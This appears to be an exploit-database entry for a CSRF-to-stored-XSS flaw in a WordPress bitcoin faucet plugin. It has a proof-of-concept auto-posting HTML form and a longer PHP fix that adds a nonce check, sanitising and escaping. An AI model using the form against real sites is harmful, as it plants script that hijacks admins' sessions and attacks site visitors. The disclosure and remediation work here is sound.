## https://sploitus.com/exploit?id=WPEX-ID:66BC783B-67E1-4BD0-99C0-322873B3A22A
Make a logged-in admin open a page containing the HTML code below:

<form action="https://example.com/wp-admin/options-general.php?page=bitcoin_faucet" method="POST">
    <input type="text" name="encoded_data" value="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%3D%3D">
    <input type="text" name="save_settings" value="Save Changes">
    <input type="submit" name="submit" value="submit">
</form>

The XSS (the payload is in the short parameter of the base64-encoded data above) will be triggered when viewing the settings again, as well as in the frontend page/post where the [WPBF] shortcode is embedded.
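
On the defensive side, the two missing controls are a CSRF nonce on the settings save and escaping of the stored value on output. The sketch below is an added example, not the plugin's own code: the `wpbf_*` function, nonce and option names are hypothetical, and it assumes `encoded_data` decodes to a JSON object with a `short` key and that the shortcode prints that value as text.

```php
<?php
// Added example with hypothetical names (wpbf_*); not the plugin's code.
// Assumption: encoded_data is base64 of a JSON object holding "short".

add_action( 'admin_init', 'wpbf_save_settings' );
function wpbf_save_settings() {
    if ( ! isset( $_POST['save_settings'], $_POST['encoded_data'] ) ) {
        return; // not a settings submission
    }
    // Only users allowed to change site options may save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // CSRF check: stops the request unless it carries a valid nonce that
    // the settings form emitted for this action. A form hosted on another
    // origin, like the one above, cannot supply it.
    check_admin_referer( 'wpbf_save_settings', 'wpbf_nonce' );

    // Strict base64 decode, then require a JSON object.
    $raw  = base64_decode( wp_unslash( $_POST['encoded_data'] ), true );
    $data = ( false === $raw ) ? null : json_decode( $raw, true );
    if ( ! is_array( $data ) ) {
        wp_die( 'Malformed settings payload.', '', array( 'response' => 400 ) );
    }
    // Sanitize on input: strips tags and collapses whitespace.
    $short = ( isset( $data['short'] ) && is_string( $data['short'] ) )
        ? sanitize_text_field( $data['short'] )
        : '';
    update_option( 'wpbf_settings', array( 'short' => $short ) );
}

// The settings form must emit the matching nonce field inside <form>:
//   wp_nonce_field( 'wpbf_save_settings', 'wpbf_nonce' );
// and print the stored value into its input with esc_attr().

add_shortcode( 'WPBF', 'wpbf_shortcode' );
function wpbf_shortcode() {
    $opts  = get_option( 'wpbf_settings', array() );
    $short = isset( $opts['short'] ) ? (string) $opts['short'] : '';
    // Escape on output as well, so a value stored before the fix
    // renders as inert text instead of markup.
    return '<span class="wpbf-short">' . esc_html( $short ) . '</span>';
}
```

The nonce closes the cross-site submission path; the output escaping is what neutralises a payload already sitting in the database.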